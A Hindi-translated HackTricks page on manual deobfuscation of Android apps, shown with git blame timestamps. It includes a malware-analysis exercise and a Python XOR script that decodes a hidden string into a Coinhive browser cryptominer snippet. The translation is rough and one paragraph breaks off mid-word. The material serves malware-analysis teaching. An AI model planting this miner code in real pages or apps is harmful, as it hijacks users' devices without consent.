hacktricks/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md

107 lines
15 KiB
Markdown
Raw Normal View History

2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके।**
2022-04-28 16:01:33 +00:00
</details>
2023-11-06 08:38:02 +00:00
**[**https://maddiestone.github.io/AndroidAppRE/obfuscation.html**](https://maddiestone.github.io/AndroidAppRE/obfuscation.html)** से कॉपी किया गया (वहां आप समाधान पा सकते हैं)**
![Logo](https://maddiestone.github.io/AndroidAppRE/images/pinkandroid.png)
2023-11-06 08:38:02 +00:00
कई बार ऐसा होता है कि आपके पास उलट-पुलट ऐप्लिकेशन होती है जो आपके द्वारा रिवर्स इंजीनियरिंग की गई उदाहरणों की तुलना में सीधी नहीं होती है। डेवलपर अपने ऐप के व्यवहार और/या अंमल को छिपाने के लिए एक या अधिक उलट-पुलट करने की तकनीक का अमल करेगा। यह निष्पक्ष और दुष्टिपूर्ण दोनों कारणों के लिए हो सकता है।
2023-11-06 08:38:02 +00:00
उलट-पुलट करने के बारे में याद रखने की कुंजी यह है कि यदि आप इसे उलट-पुलट करना चाहते हैं, तो आप कर सकते हैं। महत्वपूर्ण निर्णय यह नहीं है कि क्या आप कर सकते हैं, बल्कि यह है कि क्या उलट-पुलट करने के लिए संसाधनों का उपयोग करना योग्य है या नहीं।
2023-11-06 08:38:02 +00:00
आप हमेशा कुछ भी उलट-पुलट कर सकते हैं क्योंकि अंततः सीपीयू को किसी न किसी समय अनउलट-पुलट कोड देखना होगा ताकि इसे चलाने के लिए।
2023-11-06 08:38:02 +00:00
## उलट-पुलट करने का तरीका <a href="how-to-de-obfuscate" id="how-to-de-obfuscate"></a>
2023-11-06 08:38:02 +00:00
ऐप्लिकेशन को उलट-पुलट करने के लिए आप कैसे चुनते हैं, यह उलट-पुलट करने की विधि पर निर्भर करेगा, लेकिन यहां कुछ सामान्य तकनीकें हैं जो आमतौर पर अच्छी तरह से काम करती हैं। यहां, हम केवल स्थिर उलट-पुलट करने की तकनीकों पर ही चर्चा करेंगे क्योंकि यह कार्यशाला केवल स्थिर विश्लेषण/रिवर्सिंग को कवर करती है। हालांकि, ध्यान दें कि ऐप्लिकेशन को चलाने और गतिशील विश्लेषण करने का एक और बढ़िया तरीका हो सकता है उलट-पुलट करने के लिए।
2023-11-06 08:38:02 +00:00
डेक्स बाइटकोड (जावा) में उलट-पुलट करने के लिए, स्थिर उलट-पुलट करने का सबसे आसान तरीका ऐप्लिकेशन में उलट-पुलट करने के तरीकों की पहचान करना है और उनके डीकंपाइलेशन को एक जावा फ़ाइल में कॉपी करना है, जिसे आप फिर उलट-पुलट फ़ाइल, स्ट्रिंग, कोड आदि पर चलाते हैं।
2023-11-06 08:38:02 +00:00
जावा और नेटिव कोड के लिए एक और समाधान है, उलट-पुलट करने की एल्गोरिदम को पायथन या किसी अन्य स्क्रिप्टिंग भाषा में अनुवाद करना, जिसमें आप सबसे अधिक सुविधाजनक हैं। मैं "अनुवाद करना" कहता हूँ क्योंकि यह ध्यान देने योग्य है कि आपको हमेशा उलट-पुलट करने की एल्गोरिदम को \*समझने\* की आवश्यकता नहीं होती है, आपको इसे चलाने का एक तरी
## अभ्यास 7 - स्ट्रिंग डीओबफस्केशन <a href="exercise-7---string-deobfuscation" id="exercise-7---string-deobfuscation"></a>
2023-11-06 08:38:02 +00:00
इस अभ्यास में, हम एक ऐप्लिकेशन का विश्लेषण करने के लिए स्ट्रिंग डीओबफस्केशन का अभ्यास करेंगे। अभ्यास के लिए हम VM में `~/samples/ClashOfLights.apk` पर उपलब्ध नमूना का उपयोग करेंगे। इस नमूने का SHA256 डाइजेस्ट c403d2dcee37f80b6d51ebada18c409a9eae45416fe84cd0c1ea1d9897eae4e5 है।
2023-11-06 08:38:02 +00:00
### लक्ष्य <a href="goals" id="goals"></a>
2023-11-06 08:38:02 +00:00
संकेतों को पहचानने और उन्हें डीओबफस्केट करने के लिए एक समाधान विकसित करना।
2023-11-06 08:38:02 +00:00
### अभ्यास संदर्भ <a href="exercise-context" id="exercise-context"></a>
2023-11-06 08:38:02 +00:00
आप एक मैलवेयर विश्लेषक हैं जो इस ऐप्लिकेशन की समीक्षा कर रहे हैं ताकि आप यह निर्धारित कर सकें कि क्या यह मैलवेयर है या नहीं। आप एक ऑबफस्केटेड जावास्क्रिप्ट स्ट्रिंग के साथ सामने आते हैं जो लोड हो रही है और इसे डीओबफस्केट करने के लिए आपको यह निर्धारित करना होगा कि क्या ऐप्लिकेशन खतरनाक है या नहीं। आप ऐप्लिकेशन को डायनामिक रूप से नहीं चला सकते हैं और स्टेटिक रूप से जावास्क्रिप्ट क्या है यह निर्धारित करने की आवश्यकता होती है।
2023-11-06 08:38:02 +00:00
### निर्देश <a href="instructions" id="instructions"></a>
2023-11-06 08:38:02 +00:00
1. डीओबफस्केट करने के लिए आपको स्ट्रिंग ढूंढ़ना होगा
2. उसे डीओबफस्केट करने वाली रूटीन की पहचान करें।
3. स्ट्रिंग को डीओबफस्केट करने के लिए आप कैसे समाधान लिखना चाहेंगे उसे निर्धारित करें।
4. यह करें :)
2023-11-06 08:38:02 +00:00
### समाधान <a href="solution" id="solution"></a>
2023-11-06 08:38:02 +00:00
डीओबफस्केट किया गया स्ट्रिंग है:
```
<script src="https://coinhive.com/lib/coinhive.min.js"></script><script>var miner = new CoinHive.Anonymous('nf24ZwEMmu0m1X6MgcOv48AMsIYErpFE', {threads: 2});miner.start();</script>
```
2023-11-06 08:38:02 +00:00
मैंने इसे डी-ऑबफस्केट करने के लिए लिखा हुआ Python स्क्रिप्ट है:
```
enc_str = "773032205849207A3831326F1351202E3B306B7D1E5A3B33252B382454173735266C3D3B53163735222D393B475C7A37222D7F38421B6A66643032205849206477303220584920643D2223725C503A3F39636C725F5C237A082C383C7950223F65023F3D5F4039353E3079755F5F666E1134141F5C4C64377A1B671F565A1B2C7F7B101F42700D1F39331717161574213F2B2337505D27606B712C7B0A543D342E317F214558262E636A6A6E1E4A37282233256C"
length = len(enc_str)
count = 0
dec_str = [0] * (length/2)
while (count < length):
2023-11-06 08:38:02 +00:00
dec_str[count/2] = (int(enc_str[count], 16) << 4) + int(enc_str[count + 1], 16) & 0xFF
count += 2
print dec_str
key = [75, 67, 81, 82, 49, 57, 84, 90]
enc_str = dec_str
count = 0
length = len(enc_str)
while (count < length):
2023-11-06 08:38:02 +00:00
dec_str[count] = chr(enc_str[count] ^ key[count % len(key)])
count += 1
print ''.join(dec_str)
```
2023-11-06 08:38:02 +00:00
## और उदाहरण <a href="more-examples" id="more-examples"></a>
2023-11-06 08:38:02 +00:00
मैंने कुछ टॉक्स किए हैं जिनमें एंड्रॉइड ऐप्स को डी-ऑबफस्केट करने के विभिन्न ऑबफस्केशन मेकेनिज़म को शामिल किया गया है। इन टॉक्स में, मैं उन्नत ऑबफस्केशन तकनीकों, उन्हें डी-ऑबफस्केट करने के लिए मेरी समाधान, और जब मैंने डी-ऑबफस्केट करने का निर्णय लेने के लिए विचार किए थे तब मैंने कैसे चुनाव किए थे, इन सबके बारे में चर्चा करता हूँ।
2023-11-06 08:38:02 +00:00
* BlackHat USA 2018: "Unpacking the Packed Unpacker: Reverse Engineering an Android Anti-Analysis Library" \[[वीडियो](https://www.youtube.com/watch?v=s0Tqi7fuOSU)]
* इस टॉक में, मैं एक ऐसी एंड्रॉइड एप्लिकेशन द्वारा उपयोग की जाने वाली सबसे जटिल एंटी-विश्लेषण प्राकृतिक पुस्तकालय का पुनर्जनन करने के बारे में चर्चा करता हूँ। इसमें मुख्य रूप से प्राकृतिक कोड में ऑबफस्केशन तकनीकों का वर्णन किया गया है।
* REcon 2019: "The Path to the Payload: Android Edition" \[[वीडियो](https://recon.cx/media-archive/2019/Session.005.Maddie_Stone.The_path_to_the_payload_Android_Edition-J3ZnNl2GYjEfa.mp4)]
* इस टॉक में, एक एंड्रॉइड बॉटनेट द्वारा उपयोग की जाने वाली एक श्रृंखला के ऑबफस्केशन तकनीकों का वर्णन किया गया है, जो केवल जावा कोड में होती है, जिसका उपयोग इसके व्यवहार को छिपाने के लिए किया जाता है।
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करने का उपयोग करना चाहते हैं? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।**
2022-04-28 16:01:33 +00:00
</details>